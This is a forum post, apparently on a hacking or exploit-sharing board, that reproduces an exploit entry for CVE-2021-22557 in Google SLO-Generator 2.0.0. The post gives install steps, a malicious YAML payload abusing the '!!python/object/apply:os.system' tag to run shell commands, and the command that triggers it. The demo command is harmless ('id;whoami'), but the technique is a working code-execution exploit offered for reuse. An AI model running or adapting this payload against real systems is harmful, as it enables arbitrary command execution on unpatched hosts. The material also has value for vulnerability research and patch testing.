This CHT Posted November 4, 2022 Group: The leader of the Content Count: 4,798 Achievement Points: 31,700 With Us For: 233 Days Status: Offline Last Seen: May 19 Device: Windows Share Posted November 4, 2022 # Exploit Title: Google SLO-Generator 2.0.0 - Code Execution # Date: 2021-09-28 # Exploit Author: Kiran Ghimire # Software Link: https://github.com/google/slo-generator/releases # Version: <= 2.0.0 # Tested on: Linux # CVE: CVE-2021-22557 ############################################################################## *Introduction*: Is a tool to compute and export Service Level Objectives (SLOs), Error Budgets and Burn Rates, using configurations written in YAML (or JSON) format. ############################################################################## *POC:* 1. pip3 install slo-generator==2.0.0 2. 2. Save the below yaml code in a file as exploit.yaml. !!python/object/apply:os.system ["id;whoami"] 3. Run the below command slo-generator migrate -b exploit.yaml ############################################################################## Link to comment Share on other sites More sharing options...
Recommended Posts